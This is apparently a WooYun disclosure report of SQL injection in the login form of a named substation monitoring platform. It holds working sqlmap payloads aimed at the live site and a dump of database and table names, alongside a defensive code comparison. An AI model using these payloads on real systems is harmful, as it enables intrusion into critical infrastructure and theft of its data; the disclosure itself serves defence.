
Vulnerability Summary (24 followers)

Defect ID: wooyun-2015-099542

Title: SQL injection in an intelligent substation monitoring system

Vendor: cncert (National Internet Emergency Center)

Author: YY-2012

Submitted: 2015-03-05 13:16

Fixed: 2015-04-20 14:22

Published: 2015-04-20 14:22

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 10

Status: Handed to a third-party partner organisation (cncert, National Internet Emergency Center) for handling

Source: http://www.wooyun.org; for questions or help, contact [email protected]


Vulnerability Details

Disclosure status:

2015-03-05: Details sent to the vendor; awaiting vendor handling
2015-03-10: Vendor confirmed; details visible to the vendor only
2015-03-20: Details disclosed to core white hats and relevant domain experts
2015-03-30: Details disclosed to regular white hats
2015-04-09: Details disclosed to intern white hats
2015-04-20: Details disclosed to the public

Brief description:

See title.

Detailed description:

iTAMS Intelligent Substation Monitoring Platform
http://itams.com.cn/
The txtUserName field of the login form is vulnerable to SQL injection via POST.

[Screenshot: aaaaaaaaaaaa2222222222222.jpg]
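As an added illustration (not code from the report or from the iTAMS product; the platform's real ASP.NET code is not on the page), the following Python stand-in shows the two ways a login query behind a txtUserName field can be written: string concatenation, which is the shape of code that yields the error-based and boolean/time-based findings sqlmap reports below, next to the same check with bound parameters. The table name userinfo is taken from the dumped schema; its columns, the sample rows, and the use of SQLite in place of MySQL are assumptions made for this example.

```python
import sqlite3

# Constructed stand-in for the platform's "userinfo" table (the table name is
# from the dumped schema; the columns, the rows and the use of SQLite instead
# of MySQL are assumptions made for this example).
SEED_ROWS = [("admin", "S3cret!"), ("operator", "p@ss")]


def make_db():
    """Create an in-memory database holding the constructed userinfo rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE userinfo (username TEXT, password TEXT)")
    conn.executemany("INSERT INTO userinfo VALUES (?, ?)", SEED_ROWS)
    conn.commit()
    return conn


def login_vulnerable(conn, username, password):
    """Login check built by string concatenation.

    Whatever the browser sends in txtUserName is spliced into the statement
    text, so a quote in the field closes the literal and the rest of the
    input is parsed as SQL.
    """
    sql = ("SELECT COUNT(*) FROM userinfo WHERE username='" + username
           + "' AND password='" + password + "'")
    return conn.execute(sql).fetchone()[0] > 0


def login_safe(conn, username, password):
    """Same check with bound parameters.

    The statement text is fixed; the driver passes the two values separately,
    so a quote in txtUserName is a character to compare, never SQL syntax.
    """
    sql = "SELECT COUNT(*) FROM userinfo WHERE username=? AND password=?"
    return conn.execute(sql, (username, password)).fetchone()[0] > 0


def raises_db_error(login_fn, conn, username, password):
    """Return True if the login function raises a database syntax error.

    A single quote in a legitimate name is enough to break the concatenated
    query; a DB error like this, when echoed to the client, is the signal
    that error-based injection tooling reads its answers from.
    """
    try:
        login_fn(conn, username, password)
    except sqlite3.OperationalError:
        return True
    return False


def boolean_oracle(login_fn, conn):
    """Show whether a truth value appended to txtUserName changes the result.

    With concatenation the true condition still logs in and the false one
    does not, so the field acts as a yes/no oracle on the database; with
    parameters neither string matches any user.
    """
    true_cond = "admin' AND '1'='1"
    false_cond = "admin' AND '1'='2"
    return (login_fn(conn, true_cond, "S3cret!"),
            login_fn(conn, false_cond, "S3cret!"))


if __name__ == "__main__":
    db = make_db()
    print("concatenated query oracle:", boolean_oracle(login_vulnerable, db))  # (True, False)
    print("parameterised query oracle:", boolean_oracle(login_safe, db))       # (False, False)
    print("concatenated query errors on O'Brien:",
          raises_db_error(login_vulnerable, db, "O'Brien", "x"))              # True
    print("parameterised query errors on O'Brien:",
          raises_db_error(login_safe, db, "O'Brien", "x"))                    # False
```

In the ASP.NET/MySQL stack the report fingerprints, the parameterised form corresponds to a MySqlCommand whose values are supplied through its Parameters collection rather than concatenated into CommandText. Two defensive checks follow from the example: every query that takes form input should bind it as a parameter, and database error text should not be returned to the browser, since error-based injection depends on reading it.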

Proof of vulnerability:

sqlmap identified the following injection points with a total of 255 HTTP(s) requests:
---
Parameter: txtUserName (POST)
Type: error-based
Title: MySQL >= 5.1 AND error-based - WHERE or HAVING clause (EXTRACTVALUE)
Payload: __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=/wEPDwUJMTkyMTY5NDMzD2QWAgIDD2QWAgIHDw8WAh4EVGV4dAUdKiDnlKjmiLflkI3miJblr4bnoIHplJnor6/vvIFkZBgBBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WAQUJaWJ0bkxvZ2luYGDRlB0xmoOBOJhlSqh1PTCfgeeFQ2gDUw/B4gklff8=&__EVENTVALIDATION=/wEWBALtie2XBgKl1bKzCQK1qbSWCwKBo5SvBSRwYSxRTT+Q99Y5PNJ45sTz5MZbRaOb6/C0jaB7TGAA&txtUserName=admin' AND EXTRACTVALUE(6496,CONCAT(0x5c,0x71767a7171,(SELECT (CASE WHEN (6496=6496) THEN 1 ELSE 0 END)),0x716b706b71)) AND 'fHDd'='fHDd&txtPassWord=123456&ibtnLogin.x=0&ibtnLogin.y=0
Type: AND/OR time-based blind
Title: MySQL < 5.0.12 AND time-based blind (heavy query)
Payload: __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=/wEPDwUJMTkyMTY5NDMzD2QWAgIDD2QWAgIHDw8WAh4EVGV4dAUdKiDnlKjmiLflkI3miJblr4bnoIHplJnor6/vvIFkZBgBBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WAQUJaWJ0bkxvZ2luYGDRlB0xmoOBOJhlSqh1PTCfgeeFQ2gDUw/B4gklff8=&__EVENTVALIDATION=/wEWBALtie2XBgKl1bKzCQK1qbSWCwKBo5SvBSRwYSxRTT+Q99Y5PNJ45sTz5MZbRaOb6/C0jaB7TGAA&txtUserName=admin' AND 8737=BENCHMARK(5000000,MD5(0x50494841)) AND 'tWfU'='tWfU&txtPassWord=123456&ibtnLogin.x=0&ibtnLogin.y=0
---
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 7.5
back-end DBMS: MySQL 5.1
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: txtUserName (POST)
Type: error-based
Title: MySQL >= 5.1 AND error-based - WHERE or HAVING clause (EXTRACTVALUE)
Payload: __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=/wEPDwUJMTkyMTY5NDMzD2QWAgIDD2QWAgIHDw8WAh4EVGV4dAUdKiDnlKjmiLflkI3miJblr4bnoIHplJnor6/vvIFkZBgBBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WAQUJaWJ0bkxvZ2luYGDRlB0xmoOBOJhlSqh1PTCfgeeFQ2gDUw/B4gklff8=&__EVENTVALIDATION=/wEWBALtie2XBgKl1bKzCQK1qbSWCwKBo5SvBSRwYSxRTT+Q99Y5PNJ45sTz5MZbRaOb6/C0jaB7TGAA&txtUserName=admin' AND EXTRACTVALUE(6496,CONCAT(0x5c,0x71767a7171,(SELECT (CASE WHEN (6496=6496) THEN 1 ELSE 0 END)),0x716b706b71)) AND 'fHDd'='fHDd&txtPassWord=123456&ibtnLogin.x=0&ibtnLogin.y=0
Type: AND/OR time-based blind
Title: MySQL < 5.0.12 AND time-based blind (heavy query)
Payload: __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=/wEPDwUJMTkyMTY5NDMzD2QWAgIDD2QWAgIHDw8WAh4EVGV4dAUdKiDnlKjmiLflkI3miJblr4bnoIHplJnor6/vvIFkZBgBBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WAQUJaWJ0bkxvZ2luYGDRlB0xmoOBOJhlSqh1PTCfgeeFQ2gDUw/B4gklff8=&__EVENTVALIDATION=/wEWBALtie2XBgKl1bKzCQK1qbSWCwKBo5SvBSRwYSxRTT+Q99Y5PNJ45sTz5MZbRaOb6/C0jaB7TGAA&txtUserName=admin' AND 8737=BENCHMARK(5000000,MD5(0x50494841)) AND 'tWfU'='tWfU&txtPassWord=123456&ibtnLogin.x=0&ibtnLogin.y=0
---
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 7.5
back-end DBMS: MySQL 5.1
Database: tlms
[31 tables]
+----------------------------+
| alarmevents |
| cameradata |
| curcameradata |
| curswaypathdata |
| curvibrationcurvedata |
| dirtinessdata |
| equipmentstate |
| hisalarmevents |
| hisequipmentstate |
| icingdata |
| lmequip |
| lmgroup |
| lmline |
| lmsignal |
| lmtype |
| ltemperaturedata |
| manaoperaterecord |
| oslevel |
| ospicture |
| ossignal |
| ostype |
| runsigdata |
| sagdata |
| swaydata |
| swaypathdata |
| towerleandata |
| userinfo |
| vibrationcurvedata |
| vibrationdata |
| weatherdata |
| windageyawdata |
+----------------------------+
Database: beijing
[33 tables]
+----------------------------+
| alarmevents |
| cameradata |
| curcameradata |
| curswaypathdata |
| curvibrationcurvedata |
| dirtinessdata |
| equipmentstate |
| hisalarmevents |
| hisequipmentstate |
| icingdata |
| lmequip |
| lmgroup |
| lmline |
| lmsignal |
| lmtype |
| ltemperaturedata |
| manaoperaterecord |
| oslevel |
| ospicture |
| ossignal |
| ostype |
| runsigdata |
| sagdata |
| swaydata |
| swaypathdata |
| towerleandata |
| userinfo |
| vibrationcurvedata |
| vibrationdata |
| videoequip |
| videorel |
| weatherdata |
| windageyawdata |
+----------------------------+
Database: 11ta
[33 tables]
+----------------------------+
| alarmevents |
| cameradata |
| curcameradata |
| curswaypathdata |
| curvibrationcurvedata |
| dirtinessdata |
| equipmentstate |
| hisalarmevents |
| hisequipmentstate |
| icingdata |
| lmequip |
| lmgroup |
| lmline |
| lmsignal |
| lmtype |
| ltemperaturedata |
| manaoperaterecord |
| oslevel |
| ospicture |
| ossignal |
| ostype |
| runsigdata |
| sagdata |
| swaydata |
| swaypathdata |
| towerleandata |
| userinfo |
| vibrationcurvedata |
| vibrationdata |
| videoequip |
| videorel |
| weatherdata |
| windageyawdata |
+----------------------------+
Database: wuhantlms
[33 tables]
+----------------------------+
| alarmevents |
| cameradata |
| curcameradata |
| curswaypathdata |
| curvibrationcurvedata |
| dirtinessdata |
| equipmentstate |
| hisalarmevents |
| hisequipmentstate |
| icingdata |
| lmequip |
| lmgroup |
| lmline |
| lmsignal |
| lmtype |
| ltemperaturedata |
| manaoperaterecord |
| oslevel |
| ospicture |
| ossignal |
| ostype |
| runsigdata |
| sagdata |
| swaydata |
| swaypathdata |
| towerleandata |
| userinfo |
| vibrationcurvedata |
| vibrationdata |
| videoequip |
| videorel |
| weatherdata |
| windageyawdata |
+----------------------------+
Database: performance_schema
[46 tables]
+----------------------------+
| accounts |
| cond_instances |
| events_stages_current |
| events_stages_history |
| events_stages_history_long |
| events_stages_summary_by_a |
| events_stages_summary_by_h |
| events_stages_summary_by_t |
| events_stages_summary_by_u |
| events_stages_summary_glob |
| events_statements_currentq |
| events_statements_history_ |
| events_statements_historyq |
| events_statements_summary_ |
| events_waits_current |
| events_waits_history |
| events_waits_history_longq |
| events_waits_summary_by_ac |
| events_waits_summary_by_ho |
| events_waits_summary_by_in |
| events_waits_summary_by_th |
| events_waits_summary_by_us |
| events_waits_summary_globa |
| file_instances |
| file_summary_by_event_name |
| file_summary_by_instance |
| host_cache |
| hosts |
| mutex_instances |
| objects_summary_global_by_ |
| performance_timers |
| rwlock_instances |
| session_account_connect_at |
| session_connect_attrs |
| setup_actors |
| setup_consumers |
| setup_instruments |
| setup_objects |
| setup_timers |
| socket_instances |
| socket_summary_by_event_na |
| socket_summary_by_instance |
| table_io_waits_summary_by_ |
| table_lock_waits_summary_b |
| threads |
| users |
+----------------------------+
Database: tlms-beijing
[31 tables]
+----------------------------+
| alarmevents |
| cameradata |
| curcameradata |
| curswaypathdata |
| curvibrationcurvedata |
| dirtinessdata |
| equipmentstate |
| hisalarmevents |
| hisequipmentstate |
| icingdata |
| lmequip |
| lmgroup |
| lmline |
| lmsignal |
| lmtype |
| ltemperaturedata |
| manaoperaterecord |
| oslevel |
| ospicture |
| ossignal |
| ostype |
| runsigdata |
| sagdata |
| swaydata |
| swaypathdata |
| towerleandata |
| userinfo |
| vibrationcurvedata |
| vibrationdata |
| weatherdata |
| windageyawdata |
+----------------------------+
Database: mysql
[41 tables]
+----------------------------+
| user |
| akbstf |
| columns_priv |
| db |
| ekdbqk |
| event |
| fikkag |
| func |
| general_log |
| help_category |
| help_keyword |
| help_relation |
| help_topic |
| innodb_index_stats |
| innodb_table_stats |
| iwwoig |
| kxtsom |
| ndb_binlog_index |
| oaigce |
| plugin |
| proc |
| procs_priv |
| proxies_priv |
| pvsouh |
| servers |
| sjbwda |
| slave_master_info |
| slave_relay_log_info |
| slave_worker_info |
| slow_log |
| tables_priv |
| tempmix4 |
| time_zone |
| time_zone_leap_second |
| time_zone_name |
| time_zone_transition |
| time_zone_transition_typeq |
| vaaxvz |
| vricta |
| vuecev |
| xrnliz |
+----------------------------+
Database: tlms-test
[31 tables]
+----------------------------+
| alarmevents |
| cameradata |
| curcameradata |
| curswaypathdata |
| curvibrationcurvedata |
| dirtinessdata |
| equipmentstate |
| hisalarmevents |
| hisequipmentstate |
| icingdata |
| lmequip |
| lmgroup |
| lmline |
| lmsignal |
| lmtype |
| ltemperaturedata |
| manaoperaterecord |
| oslevel |
| ospicture |
| ossignal |
| ostype |
| runsigdata |
| sagdata |
| swaydata |
| swaypathdata |
| towerleandata |
| userinfo |
| vibrationcurvedata |
| vibrationdata |
| weatherdata |
| windageyawdata |
+----------------------------+
Database: itams1.3
[42 tables]
+----------------------------+
| cfgequipment |
| cfghouse |
| cfgport |
| cfgrfidreader |
| cfgrfidtag |
| cfgsamplerunit |
| cfgsignal |
| cfgstation |
| cfgstreamsrv |
| cfgvideo |
| cfgvideorel |
| cfgvideosrv |
| cfgworkstation |
| clerktype |
| controlqueue |
| doorctlunitevents |
| doorctlunitoperate |
| hisalarmdata |
| hiscontrolqueue |
| hisdata |
| manaclerk |
| manaoperaterecord |
| manaservice |
| manaset |
| oscondctrl |
| osdevstatecond |
| oslevel |
| ospicture |
| ossignal |
| ostype |
| osuserpower |
| osvideo |
| rfidrecd |
| runalarmmsge |
| stationworkers |
| stdclass |
| stdcondition |
| stdmsge |
| stdpart |
| stdsampler |
| stdtype |
| workersdoorcard |
+----------------------------+
Database: sh
[33 tables]
+----------------------------+
| alarmevents |
| cameradata |
| curcameradata |
| curswaypathdata |
| curvibrationcurvedata |
| dirtinessdata |
| equipmentstate |
| hisalarmevents |
| hisequipmentstate |
| icingdata |
| lmequip |
| lmgroup |
| lmline |
| lmsignal |
| lmtype |
| ltemperaturedata |
| manaoperaterecord |
| oslevel |
| ospicture |
| ossignal |
| ostype |
| runsigdata |
| sagdata |
| swaydata |
| swaypathdata |
| towerleandata |
| userinfo |
| vibrationcurvedata |
| vibrationdata |
| videoequip |
| videorel |
| weatherdata |
| windageyawdata |
+----------------------------+
Database: shanghai
[31 tables]
+----------------------------+
| alarmevents |
| cameradata |
| curcameradata |
| curswaypathdata |
| curvibrationcurvedata |
| dirtinessdata |
| equipmentstate |
| hisalarmevents |
| hisequipmentstate |
| icingdata |
| lmequip |
| lmgroup |
| lmline |
| lmsignal |
| lmtype |
| ltemperaturedata |
| manaoperaterecord |
| oslevel |
| ospicture |
| ossignal |
| ostype |
| runsigdata |
| sagdata |
| swaydata |
| swaypathdata |
| towerleandata |
| userinfo |
| vibrationcurvedata |
| vibrationdata |
| weatherdata |
| windageyawdata |
+----------------------------+
Database: sakila
[23 tables]
+----------------------------+
| language |
| actor |
| actor_info |
| address |
| category |
| city |
| country |
| customer |
| customer_list |
| film |
| film_actor |
| film_category |
| film_list |
| film_text |
| inventory |
| nicer_but_slower_film_list |
| payment |
| rental |
| sales_by_film_category |
| sales_by_store |
| staff |
| staff_list |
| store |
+----------------------------+
Database: information_schema
[59 tables]
+----------------------------+
| CHARACTER_SETS |
| COLLATIONS |
| COLLATION_CHARACTER_SET_AP |
| COLUMNS |
| COLUMN_PRIVILEGES |
| ENGINES |
| EVENTS |
| FILES |
| GLOBAL_STATUS |
| GLOBAL_VARIABLES |
| INNODB_BUFFER_PAGE |
| INNODB_BUFFER_PAGE_LRU |
| INNODB_BUFFER_POOL_STATS |
| INNODB_CMP |
| INNODB_CMPMEM |
| INNODB_CMPMEM_RESET |
| INNODB_CMP_PER_INDEX |
| INNODB_CMP_PER_INDEX_RESET |
| INNODB_CMP_RESET |
| INNODB_FT_BEING_DELETED |
| INNODB_FT_CONFIG |
| INNODB_FT_DEFAULT_STOPWORD |
| INNODB_FT_DELETED |
| INNODB_FT_INDEX_CACHE |
| INNODB_FT_INDEX_TABLE |
| INNODB_LOCKS |
| INNODB_LOCK_WAITS |
| INNODB_METRICS |
| INNODB_SYS_COLUMNS |
| INNODB_SYS_DATAFILES |
| INNODB_SYS_FIELDS |
| INNODB_SYS_FOREIGN |
| INNODB_SYS_FOREIGN_COLS |
| INNODB_SYS_INDEXES |
| INNODB_SYS_TABLES |
| INNODB_SYS_TABLESPACES |
| INNODB_SYS_TABLESTATS |
| INNODB_TRX |
| KEY_COLUMN_USAGE |
| OPTIMIZER_TRACE |
| PARAMETERS |
| PARTITIONS |
| PLUGINS |
| PROCESSLIST |
| PROFILING |
| REFERENTIAL_CONSTRAINTS |
| ROUTINES |
| SCHEMATA |
| SCHEMA_PRIVILEGES |
| SESSION_STATUS |
| SESSION_VARIABLES |
| STATISTICS |
| TABLES |
| TABLESPACES |
| TABLE_CONSTRAINTS |
| TABLE_PRIVILEGES |
| TRIGGERS |
| USER_PRIVILEGES |
| VIEWS |
+----------------------------+
Database: 1.1
[33 tables]
+----------------------------+
| alarmevents |
| cameradata |
| curcameradata |
| curswaypathdata |
| curvibrationcurvedata |
| dirtinessdata |
| equipmentstate |
| hisalarmevents |
| hisequipmentstate |
| icingdata |
| lmequip |
| lmgroup |
| lmline |
| lmsignal |
| lmtype |
| ltemperaturedata |
| manaoperaterecord |
| oslevel |
| ospicture |
| ossignal |
| ostype |
| runsigdata |
| sagdata |
| swaydata |
| swaypathdata |
| towerleandata |
| userinfo |
| vibrationcurvedata |
| vibrationdata |
| videoequip |
| videorel |
| weatherdata |
| windageyawdata |
+----------------------------+
Database: world
[3 tables]
+----------------------------+
| city |
| country |
| countrylanguage |
+----------------------------+
Database: hndnms
[54 tables]
+----------------------------+
| alarmevents |
| cameradata |
| curcameradata |
| curswaypathdata |
| curvibrationcurvedata |
| dirtinessdata |
| equipmentstate |
| hd_device_cam |
| hd_device_group |
| hd_device_group_detail |
| hd_device_ioport |
| hd_device_route |
| hd_log_alarm |
| hd_log_event |
| hd_log_sys |
| hd_log_upgrade |
| hd_map |
| hd_map_element |
| hd_ptz_cruise |
| hd_ptz_preset |
| hd_r_role |
| hd_r_user |
| hd_res_depart |
| hd_res_device |
| hd_res_right |
| hd_res_server |
| hd_res_type |
| hd_strategy_info |
| hd_vendor |
| hd_vendor_product |
| hisalarmevents |
| hisequipmentstate |
| icingdata |
| lmequip |
| lmgroup |
| lmline |
| lmsignal |
| lmtype |
| ltemperaturedata |
| manaoperaterecord |
| oslevel |
| ospicture |
| ossignal |
| ostype |
| runsigdata |
| sagdata |
| swaydata |
| swaypathdata |
| towerleandata |
| userinfo |
| vibrationcurvedata |
| vibrationdata |
| weatherdata |
| windageyawdata |
+----------------------------+
Database: shanghai-tlms
[33 tables]
+----------------------------+
| alarmevents |
| cameradata |
| curcameradata |
| curswaypathdata |
| curvibrationcurvedata |
| dirtinessdata |
| equipmentstate |
| hisalarmevents |
| hisequipmentstate |
| icingdata |
| lmequip |
| lmgroup |
| lmline |
| lmsignal |
| lmtype |
| ltemperaturedata |
| manaoperaterecord |
| oslevel |
| ospicture |
| ossignal |
| ostype |
| runsigdata |
| sagdata |
| swaydata |
| swaypathdata |
| towerleandata |
| userinfo |
| vibrationcurvedata |
| vibrationdata |
| videoequip |
| videorel |
| weatherdata |
| windageyawdata |
+----------------------------+

Remediation:

Contact the vendor.

Copyright notice: please credit YY-2012@WooYun when reposting.


Vulnerability Response

Vendor response:

Severity: High

Vulnerability Rank: 12

Confirmed: 2015-03-10 13:08

Vendor reply:

Latest status:

None yet